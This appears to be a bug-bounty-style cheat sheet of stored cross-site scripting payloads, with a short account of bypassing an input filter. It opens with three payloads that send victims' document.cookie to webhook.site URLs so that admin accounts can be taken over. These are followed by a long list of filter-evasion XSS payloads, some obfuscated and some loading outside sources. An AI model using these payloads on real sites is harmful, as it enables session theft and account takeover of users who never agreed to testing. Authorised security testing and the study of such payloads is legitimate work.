👑Find Stored - XSS (CWE-79)

Payloads for Stored XSS on Admin endpoint to Account Takeover use Cookie Stealing:

Note: if Simple Payload Not work the to encode the payloads in Base64 before inputting them

'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?c='+document.cookie;">
"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>

Vulnerability Reported: Multiple Stored XSS to a Single Target.
Bounty: $$$$

I recently targeted an old program with very few reported vulnerabilities. Initially, I struggled to find any issues, but I decided to dig deeper. During my research, I discovered an input field that allowed HTML injection, despite having several restrictions:

- No "greater than" (>)
- No double or single quotes (", ')
- No JavaScript events (onload, onerror, etc.)
- No double slashes (//)

After experimenting for about 10-20 minutes, I crafted a payload that bypassed these limitations:
<iframe src=javascript​:prompt`${origin}` xss

The XSS executed successfully, and the payload reflected in the code as:
<iframe src="javascript​:prompt`${origin}`" xss="">

Payloads

<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
<input onfocus='alert(1)'>XSS
<input onfocus='alert(1)' autofocus>XSS
<a href="javas&#9;cript:alert(origin)">XSS</a>
<img src=x onerror="alert(origin)">
<iframe/onload=alert(document.domain)>
<a AutoFocus contenteditable OnFocus=prompt`${origin}`>
<IFRAME SRC="javascript:confirm(origin);"></IFRAME>
<Img Src=OnXSS OnError=confirm(document.cookie)>
/><svg src=x onload=confirm(document.domain);>
<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>
"><h1>asad</h1><svg><circle><set onbegin=confirm(document.cookie) attributename=fill>
<embed src=//14.rs>
 <script src="data:text/javascript,alert(1)"></script>
<Img Src=OnXSS OnError=confirm("Hacked_by_asad")>
"<iframe src="evil.source" onload="alert(document.domain)"></iframe>
"><iframe src=https://shorturl.at/uFGNV onload=alert(document.domain)></iframe>
xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
'"</SCRIPT>--!><SCRIPT>alert(String.fromCharCode(71,104,48,53,116,80,84))</SCRIPT>
<svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">

-------------------------------------------------------------

if "alert" , "confim" , "prompt" Not Allowed

Alternatives

-------------------------------------------------------------

if "Greater than" (>) Sign Not Allowed

Alternatives

<="" 
svg=""
;"

Payloads

<svg onload="prompt(origin)"
<svg onload="prompt(origin)" <="" 
<svg onload=prompt(origin) xss=""
<img src="x" onerror="prompt(origin);"

-------------------------------------------------------------

if "Parentheses" ( ) Not Allowed

Alternative

prompt`${origin}`

Payload

<a AutoFocus contenteditable OnFocus=prompt`${origin}`>